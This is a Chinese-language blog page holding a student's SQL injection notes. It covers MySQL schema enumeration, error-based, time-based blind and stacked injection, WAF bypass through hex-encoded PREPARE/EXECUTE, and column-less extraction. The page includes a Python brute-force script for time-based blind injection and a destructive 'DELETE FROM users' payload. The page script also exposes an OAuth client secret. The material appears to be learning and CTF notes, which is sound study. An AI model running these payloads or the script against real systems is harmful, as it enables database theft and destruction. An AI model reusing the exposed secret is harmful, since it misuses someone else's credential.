<!doctype html>
<html lang="en"><head><meta charset="utf-8"><meta name="generator" content="Hexo 4.2.1"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"><meta><title>SQL注入笔记 - AFKL&#039;s Blog</title><meta description="SQL注入笔记这里是我的SQL注入笔记，绝赞更新中！欢迎批评斧正！"><meta property="og:type" content="blog"><meta property="og:title" content="SQL注入笔记"><meta property="og:url" content="https://afkl-cuit.github.io/2020/02/24/SQL%E6%B3%A8%E5%85%A5%E7%AC%94%E8%AE%B0/"><meta property="og:site_name" content="AFKL&#039;s Blog"><meta property="og:description" content="SQL注入笔记这里是我的SQL注入笔记，绝赞更新中！欢迎批评斧正！"><meta property="og:locale" content="en_US"><meta property="og:image" content="https://www.afkl.ml/usr/uploads/2020/02/531845518.png"><meta property="article:published_time" content="2020-02-24T12:31:00.000Z"><meta property="article:modified_time" content="2020-06-26T15:54:17.373Z"><meta property="article:author" content="AFKL"><meta property="article:tag" content="Blog"><meta property="twitter:card" content="summary"><meta property="twitter:image" content="https://www.afkl.ml/usr/uploads/2020/02/531845518.png"><script type="application/ld+json">{"@context":"https://schema.org","@type":"BlogPosting","mainEntityOfPage":{"@type":"WebPage","@id":"https://afkl-cuit.github.io/2020/02/24/SQL%E6%B3%A8%E5%85%A5%E7%AC%94%E8%AE%B0/"},"headline":"AFKL's Blog","image":["https://www.afkl.ml/usr/uploads/2020/02/531845518.png"],"datePublished":"2020-02-24T12:31:00.000Z","dateModified":"2020-06-26T15:54:17.373Z","author":{"@type":"Person","name":"AFKL"},"description":"SQL注入笔记这里是我的SQL注入笔记，绝赞更新中！欢迎批评斧正！"}</script><link rel="canonical" href="https://afkl-cuit.github.io/2020/02/24/SQL%E6%B3%A8%E5%85%A5%E7%AC%94%E8%AE%B0/"><link rel="icon" href="https://img.moegirl.org/common/b/b7/Transparent_Akkarin.jpg"><link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.12.0/css/all.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/highlight.js@9.12.0/styles/atom-one-light.css"><link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Ubuntu:wght@400;600&amp;family=Source+Code+Pro"><link rel="stylesheet" href="/css/default.css"><style>body>.footer,body>.navbar,body>.section{opacity:0}</style><!--!--><script src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" defer></script><!--!--><!--!--><script src="https://cdn.jsdelivr.net/npm/pace-js@1.0.2/pace.min.js"></script><link rel="alternate" href="/feed.xml" title="AFKL's Blog" type="application/atom+xml">
</head><body class="is-2-column"><nav class="navbar navbar-main"><div class="container"><div class="navbar-brand justify-content-center"><a class="navbar-item navbar-logo" href="/">AFKL&#039;s Blog</a></div><div class="navbar-menu"><div class="navbar-start"><a class="navbar-item" href="/">Home</a><a class="navbar-item" href="/archives">Archives</a><a class="navbar-item" href="/about">About</a><a class="navbar-item" href="/link">Link</a></div><div class="navbar-end"><a class="navbar-item search" title="Search" href="javascript:;"><i class="fas fa-search"></i></a></div></div></div></nav><section class="section"><div class="container"><div class="columns"><div class="column order-2 column-main is-8-tablet is-8-desktop is-8-widescreen"><div class="card"><article class="card-content article" role="article"><div class="article-meta size-small is-uppercase level is-mobile"><div class="level-left"><time class="level-item" dateTime="2020-02-24T12:31:00.000Z" title="2020-02-24T12:31:00.000Z">2020-02-24</time><span class="level-item">15 minutes read (About 2300 words)</span><span class="level-item" id="busuanzi_container_page_pv"><i class="far fa-eye"></i>&nbsp;&nbsp;<span id="busuanzi_value_page_pv">0</span> visits</span></div></div><h1 class="title is-3 is-size-4-mobile">SQL注入笔记</h1><div class="content"><h1 id="SQL注入笔记"><a href="#SQL注入笔记" class="headerlink" title="SQL注入笔记"></a>SQL注入笔记</h1><p>这里是我的SQL注入笔记，绝赞更新中！欢迎批评斧正！</p>
<p>[TOC]</p>
<h2 id="普通注入-amp-amp-基础命令"><a href="#普通注入-amp-amp-基础命令" class="headerlink" title="普通注入&amp;&amp;基础命令"></a>普通注入&amp;&amp;基础命令</h2><h3 id="常用查库、表指令"><a href="#常用查库、表指令" class="headerlink" title="常用查库、表指令"></a>常用查库、表指令</h3><pre><code>查库： select schema_name from information_schema.schemata &lt;==&gt; show databases

查表：select table_name from information_schema.tables where table_schema=0x7365637572697479(库名)    //&apos;security&apos;

查列：select column_name from information_schema.columns where table_name=&apos;~~~~&apos;;    //column 列；栏

查字段：select (column1),(column2) from (表名).(列名);</code></pre><p>其中schema_name;table_name;column_name…可视为一种全局变量;</p>
<h3 id="concat-函数、ordor-by"><a href="#concat-函数、ordor-by" class="headerlink" title="concat()函数、ordor by"></a>concat()函数、ordor by</h3><p>有时查列或表一次性无法显示全，就用group_concat()包住上列全局变量;<br>group_concat()的作用是将所有数据拼接为1行显示，详细可查看concat函数介绍;</p>
<p>order by指令原本用于排序，但在注入中可以用于确定列数；<br>假定某表有3列；</p>
<pre><code>/?id=1&apos; order by 1;--&gt;成功
/?id=1&apos; order by 2;--&gt;成功
/?id=1&apos; order by 3;--&gt;成功
/?id=1&apos; order by 4;--&gt;失败</code></pre><p>故此表有三列;<br>limit (起始序号(0开始)),(展示行数);<br>待补充…</p>
<h3 id="不常用全局变量"><a href="#不常用全局变量" class="headerlink" title="不常用全局变量"></a>不常用全局变量</h3><pre><code>select system_user()&lt;==&gt;user()    //展示系统用户

select database()            //展示数据库名

select version()            //展示版本信息

select @@datadir            //展示数据储存路径

select @@version_compile_os    //展示服务器系统</code></pre><h3 id="为什么会有1-2-select…"><a href="#为什么会有1-2-select…" class="headerlink" title="为什么会有1,2,select…"></a>为什么会有1,2,select…</h3><p>类似于（union selcet 1,2,<del>#）的缘故:<br>上例是确定了此表有三列，为想要的数据得到展示，选择第三列来显示;<br>当如（union 1,selcet ~</del>,3#）时数据会出现在第二列;</p>
<h2 id="报错注入"><a href="#报错注入" class="headerlink" title="报错注入"></a>报错注入</h2><h3 id="XPath语法错误注入"><a href="#XPath语法错误注入" class="headerlink" title="XPath语法错误注入"></a>XPath语法错误注入</h3><h4 id="extractvalue"><a href="#extractvalue" class="headerlink" title="extractvalue()"></a>extractvalue()</h4><p>extractvalue()：从目标XML中返回包含所查询值的字符串。<br>EXTRACTVALUE (XML_document, XPath_string);<br>第一个参数：XML_document是String格式，为XML文档对象的名称<br>第二个参数：XPath_string (Xpath格式的字符串)<br>concat:返回结果为连接参数产生的字符串。<br>当我们在XPath_string故意填入错误的XPath时，在回显报错的同时会执行XPath的sql语句。<br>可根据此函数进行报错注入</p>
<pre><code>// 这里是为了绕过空格的检测，所以用()把所有的东西包裹起来
// 0x7e是“~”，是sql的一元运算符，可以防止在回显的时候不回显第一组数据
// 可以的话想用0x5e“^”也可以...
extractvalue(NULL,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables))))#
extractvalue(NULL,concat(0x7e,(select(group_concat(schema_name))from(information_schema.schemata))))#</code></pre><h4 id="UPDATEXML"><a href="#UPDATEXML" class="headerlink" title="UPDATEXML()"></a>UPDATEXML()</h4><p>UPDATEXML (XML_document, XPath_string, new_value);<br>第一个参数：XML_document是String格式，为XML文档对象的名称<br>第二个参数：XPath_string (Xpath格式的字符串)<br>第三个参数：new_value，String格式，替换查找到的符合条件的数据<br>和上面同理，但需要多加一个NULL</p>
<h3 id="整型溢出错误注入（SQL-lt-5-5-53）"><a href="#整型溢出错误注入（SQL-lt-5-5-53）" class="headerlink" title="整型溢出错误注入（SQL&lt;5.5.53）"></a>整型溢出错误注入（SQL&lt;5.5.53）</h3><pre><code>select ~0;
&gt;&gt;&gt; 18446744073709551615</code></pre><p>这里我们对0进行了取反，导致数据溢出</p>
<pre><code>select !(select * from (select user())x);
&gt;&gt;&gt; 1</code></pre><p>当一条语句执行成功时，返回0。因此非一下就变成了“1”.</p>
<pre><code>select exp(710);
&gt;&gt;&gt; ERROR 1690 (22003): DOUBLE value is out of range in &apos;exp(710)&apos;</code></pre><p>这里exp()计算自然指数。到了710就已经溢出了，我们尝试：</p>
<pre><code>select exp(~(select*from(select user())x));
&gt;&gt;&gt; DOUBLE value is out of range in &apos;exp(~((select &apos;root@localhost&apos; from dual)))&apos;</code></pre><p>虽然报错，但成功返回用户信息。以此来注入。</p>
<h2 id="时间盲注"><a href="#时间盲注" class="headerlink" title="时间盲注"></a>时间盲注</h2><h3 id="时间盲注-1"><a href="#时间盲注-1" class="headerlink" title="时间盲注"></a>时间盲注</h3><p>在时间盲注中共使用了4个比较重要的语句：</p>
<pre><code>sleep(s);         # 将语句延迟s秒
if(a,b,c);         # 如果a语句成立，执行b，否则执行c
ascii(a);        # 将语句a的字符转换为ascii(十进制)
substr(a,b,c);    # 将a的语句，从b(num)的位置开始，截取c(num)个字符</code></pre><p>我们将其一个一个结合起来就可以得到：</p>
<pre><code>select if((ascii(substr((select group_concat(TABLE_NAME) from information_schema.TABLES where TABLE_SCHEMA=database()),?,1))=?),sleep(5),1);
# 一一拆分对应
select if(@a,sleep(5),1)     #如果@a语句成立，执行sleep(5)，否则返回1
@a=(ascii(@b)=?)            #判断ascii后的@b是否等于?中的数字
@b=substr(@c,?,1)            #从?处开始，截取@c语句中的1个字符
@c=(select group_concat(TABLE_NAME) from information_schema.TABLES where TABLE_SCHEMA=database())     #查表语句，可以变换为查列，查字段的语句</code></pre><p>由此，我们可以实现爆破来获得信息<br>这里来一个python脚本(版本&gt;3.0)（十分臃肿</p>
<pre><code>import requests

mode = input(&quot;plz input use mode:&quot;)
# T查表 C查列 F查字段
while(True):
    if(mode == &apos;T&apos;):
        payload = &apos;select if((ascii(substr((select group_concat(TABLE_NAME) from information_schema.TABLES where TABLE_SCHEMA=database()),%s,1))=%s),sleep(5),1)&apos;
        break

    elif(mode == &apos;C&apos;):
        tab = input(&apos;plz input tables_name:&apos;)
        payload = &apos;select if((ascii(substr((select group_concat(COLUMN_NAME) from information_schema.COLUMNS where TABLE_NAME=0x&apos;+tab.encode(&apos;UTF-8&apos;).hex()+&apos;),%s,1)))=%s,sleep(5),1)&apos;
        break

    elif(mode == &apos;F&apos;):
        tab = input(&apos;plz input tables_name:&apos;)
        col = input(&apos;plz input col_name:&apos;)
        payload = &apos;select if((ascii(substr((select &apos;+ col +&apos; from &apos;+ tab +&apos; limit 0,1),%s,1))=%s),sleep(5),1)&apos;
        break

    elif(mode != &apos;F&apos;|&apos;C&apos;|&apos;T&apos;):
        print(&apos;Error&apos;)

url = &apos;http://114514.com/FAQ.php&apos;
res = &apos;&apos;
sel_num = input(&quot;plz input sel_num:&quot;)
# 要查询的字符数

for i in range(1,sel_num):
    print(i)
    for j in range(32,127):
        print(chr(j))
        now_payload = payload % (i,j)
        try:
            r = requests.post(url=url,data=now_payload,timeout=4.5)
            # 这里视情况更改
        except:
            res += chr(j)
print(res)</code></pre><h2 id="sql堆叠注入"><a href="#sql堆叠注入" class="headerlink" title="sql堆叠注入"></a>sql堆叠注入</h2><h3 id="原理"><a href="#原理" class="headerlink" title="原理"></a>原理</h3><p>在一定条件下，我们可以通过 “ ; ” 提前结束sql语句，并在后面跟上其它sql语句，得到执行。在myphpadmin我们便可以这样多句执行<br>比如：</p>
<pre><code>$a = $_GET[&apos;a&apos;];
$sql = &quot;SELECT * FROM users WHERE id=$id&quot;;</code></pre><p>在这里我们甚至可以构造：</p>
<pre><code>$a = &quot;1;DELETE FROM users&quot;;</code></pre><p>将整个users表全部删除！可见其危害有多大<br>不过一般来说，这种注入的局限比较大…<br>可能数据库引擎不支持，权限不足等…都会导致注入失败，还有就是，结果不一定会有回显…<br>yysy,我刚开始我从字面意思以为是什么数据溢出的骚操作（</p>
<h3 id="应用"><a href="#应用" class="headerlink" title="应用"></a>应用</h3><h4 id="sql预处理语句"><a href="#sql预处理语句" class="headerlink" title="sql预处理语句"></a>sql预处理语句</h4><p>在可以进行堆叠注入时，且像”select、or…“等重要语句被过滤时，可以使用sql预处理语句</p>
<pre><code>SET @a=&quot;select * from users&quot;; #怎么说？设定了一个a变量
PREPARE test FROM @a; #使test=@a
EXECUTE test; #加载test语句</code></pre><p>这样，我们就可以执行@a所设定的语句<br>再来，我们将我们的@a所设定的语句转换为hex，即可绕过大多数的waf<br>这里，我们尝试：</p>
<pre><code>http://114514.com/?id=1&apos;;SET+@a=0x73656C65637420736C656570283529;PREPARE+test+FROM+@a;EXECUTE+test;&quot;
//select sleep(5);</code></pre><h2 id="bypass-information-schema"><a href="#bypass-information-schema" class="headerlink" title="bypass - information_schema"></a>bypass - information_schema</h2><h3 id="原理-1"><a href="#原理-1" class="headerlink" title="原理"></a>原理</h3><p>也不是什么奇技淫巧，只是有其它的类似于information_schema的东西可以用来替代。<br>这里先只给出payload，详细原理之后补上。不知其所以然是不行的。</p>
<pre><code># 无自增id时
select 1,2,group_concat(table_name)from sys.schema_table_statistics_with_buffer where table_schema=database();
+---+---+-------------------------------+
| 1 | 2 | group_concat(table_name)      |
+---+---+-------------------------------+
| 1 | 2 | users,emails,uagents,referers |
+---+---+-------------------------------+

# 有自增id时
select 1,2,group_concat(table_name)from sys.schema_auto_increment_columns where table_schema=database()；
+---+---+-------------------------------+
| 1 | 2 | group_concat(table_name)      |
+---+---+-------------------------------+
| 1 | 2 | emails,referers,uagents,users |
+---+---+-------------------------------+</code></pre><p><a href="https://www.anquanke.com/post/id/193512">https://www.anquanke.com/post/id/193512</a><br>原作者说，可能还有更多方式，但我现在时间有限。之后再说。</p>
<h2 id="as别名的无列名注入"><a href="#as别名的无列名注入" class="headerlink" title="as别名的无列名注入"></a>as别名的无列名注入</h2><h3 id="原理-2"><a href="#原理-2" class="headerlink" title="原理"></a>原理</h3><p>通过as和虚拟表来使数据导入至虚拟表并赋予别名，以此在不知道列名的状况下，通过别名窃取到数据。</p>
<h3 id="as语句"><a href="#as语句" class="headerlink" title="as语句"></a>as语句</h3><p>要了解此注入先需要知道什么是as。<br>其实也简单，它就是为数据起了一个别名。<br>例如，我使用如下语句查询到了以下结果：</p>
<pre><code>select * from users;
+----+----------+------------+
| id | username | password   |
+----+----------+------------+
|  1 | Dumb     | Dumb       |
|  2 | Angelina | I-kill-you |
|  3 | Dummy    | p@ssword   |
|  4 | secure   | crappy     |
|  5 | stupid   | stupidity  |
|  6 | superman | genious    |
|  7 | batman   | mob!le     |
|  8 | admin    | admin      |
|  9 | admin1   | admin1     |
| 10 | admin2   | admin2     |
| 11 | admin3   | admin3     |
| 12 | dhakkan  | dumbo      |
| 14 | admin4   | admin4     |
+----+----------+------------+</code></pre><p>这时候，可能有人不懂洋文(比如我)，这时候我们可以用as语句进行转换：</p>
<pre><code>select id as 编号,username as 用户名,password as 密码 from users;
+--------+-----------+------------+
| 编号    |  用户名    | 密码       |
+--------+-----------+------------+
|      1 | Dumb      | Dumb       |
|      2 | Angelina  | I-kill-you |
|      3 | Dummy     | p@ssword   |
|      4 | secure    | crappy     |
|      5 | stupid    | stupidity  |
|      6 | superman  | genious    |
|      7 | batman    | mob!le     |
|      8 | admin     | admin      |
|      9 | admin1    | admin1     |
|     10 | admin2    | admin2     |
|     11 | admin3    | admin3     |
|     12 | dhakkan   | dumbo      |
|     14 | admin4    | admin4     |
+--------+-----------+------------+</code></pre><p>可以发现，id、username、password都变成了中文。</p>
<h3 id="无列名查询"><a href="#无列名查询" class="headerlink" title="无列名查询"></a>无列名查询</h3><p>但需要注意的是，这并不是在原表修改的，而是产生了一张虚拟表。这使得我们可以不用查列名即可获得数据。这就让我们可以干一些奇怪的事情。<br>注意，这里需要知道表的列数(其实也容易获取)</p>
<pre><code>select 1,2,3 as c;
# 获得了一张虚拟表，最后列名是c
+---+---+---+
| 1 | 2 | c |
+---+---+---+
| 1 | 2 | 3 |
+---+---+---+

select 1,2,3 as c union select * from users;
# 我们发现原有的列名被替换了
+----+----------+------------+
| 1  | 2        | c          |
+----+----------+------------+
|  1 | 2        | 3          |
|  1 | Dumb     | Dumb       |
|  2 | Angelina | I-kill-you |
|  3 | Dummy    | p@ssword   |
|  4 | secure   | crappy     |
|  5 | stupid   | stupidity  |
|  6 | superman | genious    |
|  7 | batman   | mob!le     |
|  8 | admin    | admin      |
|  9 | admin1   | admin1     |
| 10 | admin2   | admin2     |
| 11 | admin3   | admin3     |
| 12 | dhakkan  | dumbo      |
| 14 | admin4   | admin4     |
+----+----------+------------+

# 这时候，我们就可以对这个虚拟表干一些奇怪的事情
select group_concat(c) from (select 1,2,3 as c union select * from users) as b;
# 这里是又建立了另一个表，让他查询我们之前导入了数据的虚拟表，便可以提出数据
# 注意，新表一定要起别名，不然会报错(指上面的as b)
# 这个太长了，我就在下面放图片了</code></pre><p><img src="https://www.afkl.ml/usr/uploads/2020/02/531845518.png" alt="getc.PNG" title="getc.PNG"></p>
</div><!--!--></article></div><!--!--><nav class="post-navigation mt-4 level is-mobile"><div class="level-start"><a class="article-nav-prev level level-item link-muted" href="/2020/02/24/FLASK%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0-WIP/"><i class="level-item fas fa-chevron-left"></i><span class="level-item">FLASK学习笔记-WIP</span></a></div><div class="level-end"><a class="article-nav-next level level-item link-muted" href="/2020/02/24/%E4%B8%8D%E5%AE%8C%E6%95%B4%E7%9A%84Hgame2020-CTF%E7%9A%84WP/"><span class="level-item">不完整的Hgame2020-CTF的WP</span><i class="level-item fas fa-chevron-right"></i></a></div></nav><div class="card"><div class="card-content"><h3 class="title is-5">Comments</h3><div id="comment-container"></div><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/gitalk@1.6.2/dist/gitalk.css"><script src="https://cdn.jsdelivr.net/npm/gitalk@1.6.2/dist/gitalk.min.js"></script><script>var gitalk = new Gitalk({
            id: '6a40052a9686c0bfce961399d4c99f1e',
            repo: 'afkl-cuit.github.io',
            owner: 'AFKL-CUIT',
            clientID: '26712c602d4f2f684041',
            clientSecret: 'd5ee2ff38c5704ffb71006c71c585727f09bf9e7',
            admin: ["AFKL-CUIT"],
            createIssueManually: false,
            distractionFreeMode: false,
            perPage: 10,
            pagerDirection: 'last',
            
            
            enableHotKey: true
        })
        gitalk.render('comment-container')</script></div></div></div><!--!--><div class="column column-right is-4-tablet is-4-desktop is-4-widescreen  order-3"><div class="card widget"><div class="card-content"><nav class="level"><div class="level-item has-text-centered flex-shrink-1"><div><figure class="image is-128x128 mx-auto mb-2"><img class="avatar is-rounded" src="https://secure.gravatar.com/avatar/7e0f346c9d7025daf3b7ff7cf9044e4f?s=220&amp;r=X&amp;d=mm" alt="AFKL"></figure><p class="title is-size-4 is-block line-height-inherit">AFKL</p><p class="is-size-6 is-block">Student</p><p class="is-size-6 is-flex justify-content-center"><i class="fas fa-map-marker-alt mr-1"></i><span>Chengdu CUIT</span></p></div></div></nav><nav class="level is-mobile"><div class="level-item has-text-centered is-marginless"><div><p class="heading">Posts</p><a href="/archives"><p class="title">13</p></a></div></div><div class="level-item has-text-centered is-marginless"><div><p class="heading">Categories</p><a href="/categories"><p class="title">0</p></a></div></div><div class="level-item has-text-centered is-marginless"><div><p class="heading">Tags</p><a href="/tags"><p class="title">11</p></a></div></div></nav><div class="level"><a class="level-item button is-primary is-rounded" href="https://github.com/AFKL-CUIT" target="_blank" rel="noopener">Follow</a></div><div class="level is-mobile"><a class="level-item button is-transparent is-marginless" target="_blank" rel="noopener" title="Github" href="https://github.com/AFKL-CUIT"><i class="fab fa-github"></i></a><a class="level-item button is-transparent is-marginless" target="_blank" rel="noopener" title="BiliBili" href="https://space.bilibili.com/3229657"><i class="fa fa-bold"></i></a><a class="level-item button is-transparent is-marginless" target="_blank" rel="noopener" title="RSS" href="/feed.xml"><i class="fas fa-rss"></i></a></div></div></div><!--!--><div class="card widget"><div class="card-content"><h3 class="menu-label">Recent</h3><article class="media"><div class="media-content size-small"><p><time dateTime="2020-11-15T07:22:02.000Z">2020-11-15</time></p><p class="title is-6"><a class="link-muted" href="/2020/11/15/%E5%A6%82%E4%BD%95%E6%8C%96%E6%8E%98%E8%87%AA%E5%B7%B1%E7%9A%84php%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%93%BE/">如何挖掘自己的php反序列化链</a></p><p class="is-uppercase"></p></div></article><article class="media"><div class="media-content size-small"><p><time dateTime="2020-11-15T04:00:48.000Z">2020-11-15</time></p><p class="title is-6"><a class="link-muted" href="/2020/11/15/php%E6%A1%86%E6%9E%B6%E5%85%A5%E9%97%A8/">php框架入门</a></p><p class="is-uppercase"></p></div></article><article class="media"><div class="media-content size-small"><p><time dateTime="2020-07-08T16:47:56.000Z">2020-07-09</time></p><p class="title is-6"><a class="link-muted" href="/2020/07/09/%E8%AE%B0%E4%B8%80%E6%AC%A1%E8%BF%9C%E7%A8%8B%E8%B0%83%E8%AF%95/">记一次远程调试</a></p><p class="is-uppercase"></p></div></article><article class="media"><div class="media-content size-small"><p><time dateTime="2020-07-01T10:16:44.000Z">2020-07-01</time></p><p class="title is-6"><a class="link-muted" href="/2020/07/01/js%E7%9A%84%E7%BB%A7%E6%89%BF%E4%B8%8E%E5%8E%9F%E5%9E%8B%E9%93%BE%E6%B1%A1%E6%9F%93/">js的继承与原型链污染</a></p><p class="is-uppercase"></p></div></article><article class="media"><div class="media-content size-small"><p><time dateTime="2020-06-16T16:33:00.000Z">2020-06-17</time></p><p class="title is-6"><a class="link-muted" href="/2020/06/17/dozerCTF-Fake-phpminiadmin/">dozerCTF - Fake phpminiadmin</a></p><p class="is-uppercase"></p></div></article></div></div><div class="card widget"><div class="card-content"><div class="menu"><h3 class="menu-label">Archives</h3><ul class="menu-list"><li><a class="level is-mobile is-marginless" href="/archives/2020/11/"><span class="level-start"><span class="level-item">November 2020</span></span><span class="level-end"><span class="level-item tag">2</span></span></a></li><li><a class="level is-mobile is-marginless" href="/archives/2020/07/"><span class="level-start"><span class="level-item">July 2020</span></span><span class="level-end"><span class="level-item tag">2</span></span></a></li><li><a class="level is-mobile is-marginless" href="/archives/2020/06/"><span class="level-start"><span class="level-item">June 2020</span></span><span class="level-end"><span class="level-item tag">1</span></span></a></li><li><a class="level is-mobile is-marginless" href="/archives/2020/05/"><span class="level-start"><span class="level-item">May 2020</span></span><span class="level-end"><span class="level-item tag">2</span></span></a></li><li><a class="level is-mobile is-marginless" href="/archives/2020/04/"><span class="level-start"><span class="level-item">April 2020</span></span><span class="level-end"><span class="level-item tag">1</span></span></a></li><li><a class="level is-mobile is-marginless" href="/archives/2020/03/"><span class="level-start"><span class="level-item">March 2020</span></span><span class="level-end"><span class="level-item tag">1</span></span></a></li><li><a class="level is-mobile is-marginless" href="/archives/2020/02/"><span class="level-start"><span class="level-item">February 2020</span></span><span class="level-end"><span class="level-item tag">4</span></span></a></li></ul></div></div></div><div class="card widget"><div class="card-content"><div class="menu"><h3 class="menu-label">Tags</h3><div class="field is-grouped is-grouped-multiline"><div class="control"><a class="tags has-addons" href="/tags/debug/"><span class="tag">debug</span><span class="tag is-grey-lightest">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/docker/"><span class="tag">docker</span><span class="tag is-grey-lightest">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/javascipt/"><span class="tag">javascipt</span><span class="tag is-grey-lightest">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/php/"><span class="tag">php</span><span class="tag is-grey-lightest">3</span></a></div><div class="control"><a class="tags has-addons" href="/tags/ssh/"><span class="tag">ssh</span><span class="tag is-grey-lightest">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/"><span class="tag">代码审计</span><span class="tag is-grey-lightest">2</span></a></div><div class="control"><a class="tags has-addons" href="/tags/%E5%8E%9F%E5%9E%8B%E9%93%BE%E6%B1%A1%E6%9F%93/"><span class="tag">原型链污染</span><span class="tag is-grey-lightest">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/"><span class="tag">反序列化</span><span class="tag is-grey-lightest">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/%E5%AF%B9%E8%B1%A1/"><span class="tag">对象</span><span class="tag is-grey-lightest">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/%E6%A1%86%E6%9E%B6/"><span class="tag">框架</span><span class="tag is-grey-lightest">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/%E7%BB%A7%E6%89%BF/"><span class="tag">继承</span><span class="tag is-grey-lightest">1</span></a></div></div></div></div></div></div></div></div></section><footer class="footer"><div class="container"><div class="level"><div class="level-start"><a class="footer-logo is-block mb-2" href="/">AFKL&#039;s Blog</a><p class="size-small"><span>&copy; 2020 AFKL</span>  Powered by <a href="https://hexo.io/" target="_blank" rel="noopener">Hexo</a> &amp; <a href="https://github.com/ppoffice/hexo-theme-icarus" target="_blank" rel="noopener">Icarus</a><br><span id="busuanzi_container_site_uv">Visited by <span id="busuanzi_value_site_uv">0</span> users</span></p></div><div class="level-end"><div class="field has-addons"><p class="control"><a class="button is-transparent is-large" target="_blank" rel="noopener" title="Creative Commons" href="https://creativecommons.org/"><i class="fab fa-creative-commons"></i></a></p><p class="control"><a class="button is-transparent is-large" target="_blank" rel="noopener" title="Attribution 4.0 International" href="https://creativecommons.org/licenses/by/4.0/"><i class="fab fa-creative-commons-by"></i></a></p><p class="control"><a class="button is-transparent is-large" target="_blank" rel="noopener" title="Download Theme on GitHub" href="https://github.com/ppoffice/hexo-theme-icarus"><i class="fab fa-github"></i></a></p></div></div></div></div></footer><script src="https://cdn.jsdelivr.net/npm/jquery@3.3.1/dist/jquery.min.js"></script><script src="https://cdn.jsdelivr.net/npm/moment@2.22.2/min/moment-with-locales.min.js"></script><script>moment.locale("en");</script><script>var IcarusThemeSettings = {
            site: {
                url: 'https://afkl-cuit.github.io',
                external_link: {"enable":true,"exclude":[]}
            },
            article: {
                highlight: {
                    clipboard: true,
                    fold: 'unfolded'
                }
            }
        };</script><script src="https://cdn.jsdelivr.net/npm/clipboard@2.0.4/dist/clipboard.min.js" defer></script><script src="/js/animation.js"></script><a id="back-to-top" title="Back to Top" href="javascript:;"><i class="fas fa-chevron-up"></i></a><script src="/js/back_to_top.js" defer></script><!--!--><!--!--><!--!--><!--!--><script src="/js/main.js" defer></script><div class="searchbox"><div class="searchbox-container"><div class="searchbox-header"><div class="searchbox-input-container"><input class="searchbox-input" type="text" placeholder="Type something..."></div><a class="searchbox-close" href="javascript:;">×</a></div><div class="searchbox-body"></div></div></div><script src="/js/insight.js" defer></script><script>document.addEventListener('DOMContentLoaded', function () {
            loadInsight({"contentUrl":"/content.json"}, {"hint":"Type something...","untitled":"(Untitled)","posts":"Posts","pages":"Pages","categories":"Categories","tags":"Tags"});
        });</script></body></html>